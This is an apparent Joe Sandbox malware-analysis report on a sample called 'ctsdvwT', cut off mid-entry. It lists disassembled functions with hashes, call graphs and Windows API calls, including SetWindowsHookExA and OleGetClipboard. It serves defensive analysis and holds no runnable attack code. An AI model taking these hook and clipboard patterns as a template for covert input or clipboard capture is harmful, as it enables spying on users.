                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: ff397ecdfa70f9151efacab772d3aa44b456923b0e68f273c4a5f864c35905c8
                                            • Instruction ID: 536230649dcc18549aa7cc63ff583f89741bd631fb94833c41e70ab17257282e
                                            • Opcode Fuzzy Hash: ff397ecdfa70f9151efacab772d3aa44b456923b0e68f273c4a5f864c35905c8
                                            • Instruction Fuzzy Hash: A81103B5800349DFCB10CF9AC844BDEBBF8EB48320F10841AE558A7210C375A544CFA1
                                            Function 076E1F10 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 489 76e1f10-76e1f82 PostMessageW 492 76e1f8b-76e1f9f 489->492 493 76e1f84-76e1f8a 489->493 493->492
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 076E1F75
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 7fd02dc55daba508626b956576ca0d2129a93f39a6c6a46e8619388816eb9db3
                                            • Instruction ID: ba0959d4643db8f0b947b6f666ade7acbcf5739f94b99ac9ffee27e4bed8d38c
                                            • Opcode Fuzzy Hash: 7fd02dc55daba508626b956576ca0d2129a93f39a6c6a46e8619388816eb9db3
                                            • Instruction Fuzzy Hash: D71103B5800349DFDB10CF99C589BDEBBF8EB08314F14881AE958B7210D375A544CFA1
                                            Function 076E41F9 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 556 76e41f9-76e4265 CloseHandle 557 76e426e-76e4296 556->557 558 76e4267-76e426d 556->558 558->557
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 076E4258
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 347216bdb0fda23972227429deb57a467fe2077f1f9709a86201426df559a772
                                            • Instruction ID: c1a2d127fc3311202075cc8e8a7d67f206e1c0e9af11fd5422b97632d39ea71d
                                            • Opcode Fuzzy Hash: 347216bdb0fda23972227429deb57a467fe2077f1f9709a86201426df559a772
                                            • Instruction Fuzzy Hash: FF1136B5800259CFCB10DF99C5457DEBBF4EF48320F14841AD568A7740D738A584CFA5
                                            Function 076E4200 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 076E4258
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1833601524.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_76e0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 3250319c9dd44711ac0316a73d666359ee5f0150fa3ab369d1c97c413adde41d
                                            • Instruction ID: ec0b120de945c7d1a731152528f1b62cd39aca6231bd732771bb84acdb10a54d
                                            • Opcode Fuzzy Hash: 3250319c9dd44711ac0316a73d666359ee5f0150fa3ab369d1c97c413adde41d
                                            • Instruction Fuzzy Hash: 5A1103B5800259CFCB10DFAAC545BDEBBF8EB48320F10845AD969A7350D738A544CFA5
                                            Function 013CD3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a5a63c5a8a1d9f770fbec34c535e0e23f0e829e2e2937decf079cc48e2e328
                                            • Instruction ID: 7366612c87179e69f68d15df12945a218fc5f97734510bf054e318c72d472fbd
                                            • Opcode Fuzzy Hash: 65a5a63c5a8a1d9f770fbec34c535e0e23f0e829e2e2937decf079cc48e2e328
                                            • Instruction Fuzzy Hash: 3C2100B1100204DFDB01DF48D9C0B66FF69EB88728F20C17DEA0A5A256C736E846CBA1
                                            Function 013CD4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14cb129749462ffb8ff3c3778c65777bae87557c568bb055d97e1ac942056c1d
                                            • Instruction ID: 5ba05edf4e25bdcd1008d2daa967c3c302dcabc3d000594a59f7db3b67699108
                                            • Opcode Fuzzy Hash: 14cb129749462ffb8ff3c3778c65777bae87557c568bb055d97e1ac942056c1d
                                            • Instruction Fuzzy Hash: 8D21ED72500244DFDB05EF58D980B2ABF65EB98B18F20C57DE9090A256C336D856CBA2
                                            Function 013DD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829960128.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13dd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                            • Instruction ID: 2ed579438782dd83e805099dff40a12e95663d53f8235ce356660f1741eb3630
                                            • Opcode Fuzzy Hash: 8b0f5d1514423aa1323a7657c043aff3f87509e2b2f00e47d688fbd73b2bbe2a
                                            • Instruction Fuzzy Hash: 74212272604204DFCB15DF68E984B26BFA5FBC8318F20C56DE80A4B296C33AD447CA61
                                            Function 013DD006 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829960128.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13dd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                            • Instruction ID: 6303f4aca7ec4d911e342b56e3a4d6baaf25cc8c3e89a6ba9ba4ac39331623ca
                                            • Opcode Fuzzy Hash: d41474449021aba6c1261ce4e4829ad3fa408ae4abebaec4f5eebd36ff9ac012
                                            • Instruction Fuzzy Hash: 9A21A1765093808FDB13CF24D994715BF71EB85218F28C5EAD8498F6A7C33AD40ACB62
                                            Function 013CD4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: da652c4296b90b9ed4d65fb55388e557be35d8aad2fcda6cb2d21c8072a6d356
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: AE11E176404280CFCB02CF54D9C4B16BF71FB94718F24C6ADE8090B256C336D85ACBA1
                                            Function 013CD3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: b5f265e443326748fbc8b030dfa9c82b5de4b417239e58c8abb6294c72d5572c
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: 6211CD72404240DFDB02CF44D9C4B56BF61FB94228F24C2ADE9090A256C33AE85ACBA1
                                            Function 013CD731 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd9c6670078da5d9cf24e78a53aa285297e0704e35d2d2de5e59d7197635fbaf
                                            • Instruction ID: 3a5f29421e15c88d1cb074934cd6c7386f66789f821a0769b60f127e1e97fbf9
                                            • Opcode Fuzzy Hash: fd9c6670078da5d9cf24e78a53aa285297e0704e35d2d2de5e59d7197635fbaf
                                            • Instruction Fuzzy Hash: F7018F710083889AE7119EA9CD84767BF9CEF41B29F18C53EFD095A296D2799C40C7B1
                                            Function 013CD730 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec26aa50984274029f92d04f9b734d342e1622ade37011ef8254340db1f5259a
                                            • Instruction ID: 6c35195b34fa90b329b64fd666896698a22be67c4932a8039763faa5ad404e1b
                                            • Opcode Fuzzy Hash: ec26aa50984274029f92d04f9b734d342e1622ade37011ef8254340db1f5259a
                                            • Instruction Fuzzy Hash: 2CF062724043849AE7118E1ACD84B66FFE8EB81739F18C56AFD085E286C2799844CBB1

                                            Execution Graph

                                            Execution Coverage:9.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:169
                                            Total number of Limit Nodes:18
                                            execution_graph 22309 655e140 22310 655e14b 22309->22310 22311 655e15b 22310->22311 22313 655dbb0 22310->22313 22314 655e190 OleInitialize 22313->22314 22315 655e1f4 22314->22315 22315->22311 22196 655c6f8 DuplicateHandle 22197 655c78e 22196->22197 22198 6558998 22199 6558a00 CreateWindowExW 22198->22199 22201 6558abc 22199->22201 22202 2f1d01c 22203 2f1d034 22202->22203 22204 2f1d08e 22203->22204 22209 655d2d2 22203->22209 22218 6558b42 22203->22218 22222 6558b50 22203->22222 22226 6556c44 22203->22226 22210 655d2da 22209->22210 22211 655d2ea 22209->22211 22210->22204 22212 655d361 22211->22212 22214 655d351 22211->22214 22246 655c2ac 22212->22246 22234 655d478 22214->22234 22240 655d488 22214->22240 22215 655d35f 22215->22215 22219 6558b76 22218->22219 22220 6556c44 2 API calls 22219->22220 22221 6558b97 22220->22221 22221->22204 22223 6558b76 22222->22223 22224 6556c44 2 API calls 22223->22224 22225 6558b97 22224->22225 22225->22204 22227 6556c4f 22226->22227 22228 655d361 22227->22228 22230 655d351 22227->22230 22229 655c2ac 2 API calls 22228->22229 22231 655d35f 22229->22231 22232 655d478 2 API calls 22230->22232 22233 655d488 2 API calls 22230->22233 22231->22231 22232->22231 22233->22231 22236 655d488 22234->22236 22235 655c2ac 2 API calls 22235->22236 22236->22235 22237 655d56e 22236->22237 22253 655d968 22236->22253 22258 655d958 22236->22258 22237->22215 22242 655d496 22240->22242 22241 655c2ac 2 API calls 22241->22242 22242->22241 22243 655d56e 22242->22243 22244 655d958 OleGetClipboard 22242->22244 22245 655d968 OleGetClipboard 22242->22245 22243->22215 22244->22242 22245->22242 22247 655c2b7 22246->22247 22248 655d674 22247->22248 22249 655d5ca 22247->22249 22250 6556c44 OleGetClipboard 22248->22250 22251 655d622 CallWindowProcW 22249->22251 22252 655d5d1 22249->22252 22250->22252 22251->22252 22252->22215 22254 655d987 22253->22254 22255 655da20 22254->22255 22263 655df20 22254->22263 22269 655dedf 22254->22269 22255->22236 22259 655d987 22258->22259 22260 655da20 22259->22260 22261 655df20 OleGetClipboard 22259->22261 22262 655dedf OleGetClipboard 22259->22262 22260->22236 22261->22259 22262->22259 22264 655df28 22263->22264 22265 655df3c 22264->22265 22275 655df58 22264->22275 22286 655df68 22264->22286 22265->22254 22266 655df51 22266->22254 22271 655df05 22269->22271 22270 655df3c 22270->22254 22271->22270 22273 655df58 OleGetClipboard 22271->22273 22274 655df68 OleGetClipboard 22271->22274 22272 655df51 22272->22254 22273->22272 22274->22272 22276 655df68 22275->22276 22277 655df95 22276->22277 22278 655dfd9 22276->22278 22282 655df58 OleGetClipboard 22277->22282 22283 655df68 OleGetClipboard 22277->22283 22280 655e059 22278->22280 22297 655e230 22278->22297 22301 655e220 22278->22301 22279 655e077 22279->22266 22280->22266 22281 655df9b 22281->22266 22282->22281 22283->22281 22287 655df7a 22286->22287 22288 655df95 22287->22288 22290 655dfd9 22287->22290 22293 655df58 OleGetClipboard 22288->22293 22294 655df68 OleGetClipboard 22288->22294 22289 655df9b 22289->22266 22292 655e059 22290->22292 22295 655e230 OleGetClipboard 22290->22295 22296 655e220 OleGetClipboard 22290->22296 22291 655e077 22291->22266 22292->22266 22293->22289 22294->22289 22295->22291 22296->22291 22299 655e245 22297->22299 22300 655e26b 22299->22300 22305 655dcc8 22299->22305 22300->22279 22302 655e230 22301->22302 22303 655dcc8 OleGetClipboard 22302->22303 22304 655e26b 22302->22304 22303->22302 22304->22279 22306 655e2d8 OleGetClipboard 22305->22306 22308 655e372 22306->22308 22316 655fe28 22317 655fe6c SetWindowsHookExA 22316->22317 22319 655feb2 22317->22319 22320 2f60848 22321 2f6084e 22320->22321 22322 2f6091b 22321->22322 22324 2f61380 22321->22324 22326 2f61396 22324->22326 22325 2f61490 22325->22321 22326->22325 22329 65558e3 22326->22329 22337 65558f8 22326->22337 22330 655590a 22329->22330 22332 65559bb 22330->22332 22345 655039c 22330->22345 22354 65503dc GetModuleHandleW 22332->22354 22333 6555981 22350 65503bc 22333->22350 22335 65559fe 22335->22326 22338 655590a 22337->22338 22339 655039c GetModuleHandleW 22338->22339 22341 65559bb 22338->22341 22340 6555981 22339->22340 22344 65503bc KiUserCallbackDispatcher 22340->22344 22396 65503dc GetModuleHandleW 22341->22396 22343 65559fe 22343->22326 22344->22341 22346 65503a7 22345->22346 22355 6556eb1 22346->22355 22361 6556ec0 22346->22361 22347 6555f6a 22347->22333 22351 65503c7 22350->22351 22353 655d8b3 22351->22353 22392 655c304 22351->22392 22353->22332 22354->22335 22356 6556ec0 22355->22356 22357 6556f6e 22356->22357 22367 6557431 22356->22367 22359 6556f9a 22357->22359 22372 6555e54 22357->22372 22362 6556eeb 22361->22362 22364 6556f6e 22362->22364 22366 6557431 GetModuleHandleW 22362->22366 22363 6556f9a 22363->22363 22364->22363 22365 6555e54 GetModuleHandleW 22364->22365 22365->22363 22366->22364 22368 655746d 22367->22368 22369 65574e9 22368->22369 22376 655760f 22368->22376 22384 655769e 22368->22384 22369->22357 22373 65578f0 GetModuleHandleW 22372->22373 22375 6557965 22373->22375 22375->22359 22377 655761a 22376->22377 22378 6555e54 GetModuleHandleW 22377->22378 22379 655773a 22378->22379 22380 6555e54 GetModuleHandleW 22379->22380 22383 65577b4 22379->22383 22381 6557788 22380->22381 22382 6555e54 GetModuleHandleW 22381->22382 22381->22383 22382->22383 22383->22369 22385 65576ee 22384->22385 22386 6555e54 GetModuleHandleW 22385->22386 22387 655773a 22386->22387 22388 6555e54 GetModuleHandleW 22387->22388 22391 65577b4 22387->22391 22389 6557788 22388->22389 22390 6555e54 GetModuleHandleW 22389->22390 22389->22391 22390->22391 22391->22369 22393 655d8c8 KiUserCallbackDispatcher 22392->22393 22395 655d936 22393->22395 22395->22351 22396->22343 22397 65578ea 22398 6557932 22397->22398 22399 6557938 GetModuleHandleW 22397->22399 22398->22399 22400 6557965 22399->22400

                                            Executed Functions

                                            Function 02F6C980 Relevance: 3.5, Strings: 1, Instructions: 2246COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,buq
                                            • API String ID: 0-4122549453
                                            • Opcode ID: 75a4ca2f7e03003885ce32185895e92f5cb75de831aee337f183b3c1cf1af430
                                            • Instruction ID: 404518740c691400ad3e1c856dc99670745062bc7cf7808f97b06d43b7c4aa25
                                            • Opcode Fuzzy Hash: 75a4ca2f7e03003885ce32185895e92f5cb75de831aee337f183b3c1cf1af430
                                            • Instruction Fuzzy Hash: 34332D31D107198EDB10DF68C884AADF7B1FF99300F15D69AD459AB221EB70AAC5CF81
                                            Function 02F69638 Relevance: 2.8, Instructions: 2815COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 092ae5d920cef03e9e539b7abc872c3f401cfe653ed5f83ec041c4a4caa4cf46
                                            • Instruction ID: ad8ee8c71a52e553415870575a68dfd413e8ed2a692497d82f35106090787c60
                                            • Opcode Fuzzy Hash: 092ae5d920cef03e9e539b7abc872c3f401cfe653ed5f83ec041c4a4caa4cf46
                                            • Instruction Fuzzy Hash: E853F831C10B1A8ACB51EF68C8845A9F7B1FF99300F51D79AE45877221FB70AAD5CB81
                                            Function 02F63E90 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 20a65d6b597a6ecc63872e552ebba7a2b8baaa155ad57be4da001438619bd538
                                            • Instruction ID: 993ffb55911a24f79eeab2a4710279f52714d5e3f102ddaf3646e75e1da0c1e8
                                            • Opcode Fuzzy Hash: 20a65d6b597a6ecc63872e552ebba7a2b8baaa155ad57be4da001438619bd538
                                            • Instruction Fuzzy Hash: 14917E70E00209DFDF24DFA9C9897EEBBF2EF88758F148129E514A7254EB749845CB81
                                            Function 02F64AA8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a6d1a0d976361fe687b3f96c56ca24ada6bb1e769e48a9e01aa5f9a8605abad
                                            • Instruction ID: 67da8585cca3f4e1897aa4bedb4a889b81bace22e682a17588eac413fe741832
                                            • Opcode Fuzzy Hash: 0a6d1a0d976361fe687b3f96c56ca24ada6bb1e769e48a9e01aa5f9a8605abad
                                            • Instruction Fuzzy Hash: E2B16D70E002098FDB20DFA9C9897ADBBF2FF88354F148529D915E7394EB749885CB91
                                            Function 06558992 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1332 6558992-6558994 1333 6558996-65589fe 1332->1333 1334 6558921-6558933 1332->1334 1336 6558a00-6558a06 1333->1336 1337 6558a09-6558a10 1333->1337 1336->1337 1338 6558a12-6558a18 1337->1338 1339 6558a1b-6558a53 1337->1339 1338->1339 1340 6558a5b-6558aba CreateWindowExW 1339->1340 1341 6558ac3-6558afb 1340->1341 1342 6558abc-6558ac2 1340->1342 1346 6558afd-6558b00 1341->1346 1347 6558b08 1341->1347 1342->1341 1346->1347 1348 6558b09 1347->1348 1348->1348
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06558AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 91bf5d06ab62edb38fe1be53b989c65d125c36da615c47c77ee86f2823935778
                                            • Instruction ID: 7d2b33533efd907be092a7a6e16596b41ecd256ba2102ced2a55e3ef59b58708
                                            • Opcode Fuzzy Hash: 91bf5d06ab62edb38fe1be53b989c65d125c36da615c47c77ee86f2823935778
                                            • Instruction Fuzzy Hash: 6B51E2B0D00319AFDB14CF9AC894ADEBFB5FF48310F24852AE818AB250D7719845CF91
                                            Function 06558998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1349 6558998-65589fe 1350 6558a00-6558a06 1349->1350 1351 6558a09-6558a10 1349->1351 1350->1351 1352 6558a12-6558a18 1351->1352 1353 6558a1b-6558aba CreateWindowExW 1351->1353 1352->1353 1355 6558ac3-6558afb 1353->1355 1356 6558abc-6558ac2 1353->1356 1360 6558afd-6558b00 1355->1360 1361 6558b08 1355->1361 1356->1355 1360->1361 1362 6558b09 1361->1362 1362->1362
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06558AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c438c25901cd4385c35d2a79cbaeb822e6c3774ce26f044e15e8713a55185455
                                            • Instruction ID: 9089daef6c26caeb46b2c9b70a09515de8384ef74e35aeee8c4f1476aa0faf6b
                                            • Opcode Fuzzy Hash: c438c25901cd4385c35d2a79cbaeb822e6c3774ce26f044e15e8713a55185455
                                            • Instruction Fuzzy Hash: 6141C0B1D00319DFDB14CF99C994ADEFBB5BF88310F24812AE818AB250D771A845CF90
                                            Function 0655C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1363 655c2ac-655d5c4 1366 655d674-655d694 call 6556c44 1363->1366 1367 655d5ca-655d5cf 1363->1367 1374 655d697-655d6a4 1366->1374 1369 655d5d1-655d608 1367->1369 1370 655d622-655d65a CallWindowProcW 1367->1370 1377 655d611-655d620 1369->1377 1378 655d60a-655d610 1369->1378 1371 655d663-655d672 1370->1371 1372 655d65c-655d662 1370->1372 1371->1374 1372->1371 1377->1374 1378->1377
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0655D649
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 9de5c6e77c4835db3e3aefa2f97c5517e2f07592235692827f6173e81b096907
                                            • Instruction ID: 2064ee9654995d30805864cb626ab7b35e7ded83c1167086571a2e828d546be6
                                            • Opcode Fuzzy Hash: 9de5c6e77c4835db3e3aefa2f97c5517e2f07592235692827f6173e81b096907
                                            • Instruction Fuzzy Hash: 384149B5A00309CFDB54CF89C488AAABBF5FF88314F25C559D519AB321C730A841CFA5
                                            Function 06557855 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1380 6557855-655785f 1381 6557861 1380->1381 1382 655787f 1380->1382 1385 6557863-655787a 1381->1385 1386 65578cf-65578de 1381->1386 1383 6557881-65578bf 1382->1383 1384 65578ed-6557930 1382->1384 1389 6557932-6557935 1384->1389 1390 6557938-6557963 GetModuleHandleW 1384->1390 1385->1382 1389->1390 1392 6557965-655796b 1390->1392 1393 655796c-6557980 1390->1393 1392->1393
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0321a27db6ff94c7f1bd78608a91c96c6666d1223367ce108b6c8b32537ba3a3
                                            • Instruction ID: 5649a76f23027cf772ab636c63182a260d5e617744bbd4cb06d50c798fd7cfed
                                            • Opcode Fuzzy Hash: 0321a27db6ff94c7f1bd78608a91c96c6666d1223367ce108b6c8b32537ba3a3
                                            • Instruction Fuzzy Hash: 503189B4E007498FCB48DFAAC45469EBBF5BF89314F20846ED849A7310D775A806CFA5
                                            Function 0655E2CC Relevance: 1.6, APIs: 1, Instructions: 79comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1399 655e2cc-655e328 1401 655e332-655e370 OleGetClipboard 1399->1401 1402 655e372-655e378 1401->1402 1403 655e379-655e3c7 1401->1403 1402->1403 1408 655e3d7 1403->1408 1409 655e3c9-655e3cd 1403->1409 1411 655e3d8 1408->1411 1409->1408 1410 655e3cf 1409->1410 1410->1408 1411->1411
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 88c20aa3a06e7a03d1e9018476c540f5e4d108c469f7dd4fcc6ca98e68ba104a
                                            • Instruction ID: 0c74c4ee40ade3025eac3d2b4afd9dfcf11903ba3fd9835a4711da56b9724500
                                            • Opcode Fuzzy Hash: 88c20aa3a06e7a03d1e9018476c540f5e4d108c469f7dd4fcc6ca98e68ba104a
                                            • Instruction Fuzzy Hash: 083102B0D01248EFDB14CFA9C959BCEBBF5BF48304F218059E504AB2A0D7B4A945CFA5
                                            Function 0655DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1412 655dcc8-655e370 OleGetClipboard 1415 655e372-655e378 1412->1415 1416 655e379-655e3c7 1412->1416 1415->1416 1421 655e3d7 1416->1421 1422 655e3c9-655e3cd 1416->1422 1424 655e3d8 1421->1424 1422->1421 1423 655e3cf 1422->1423 1423->1421 1424->1424
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 25b11d1cfdde839ca3cd3f7a79e7cff116c6255a33e38cb3f2a16375a8df955e
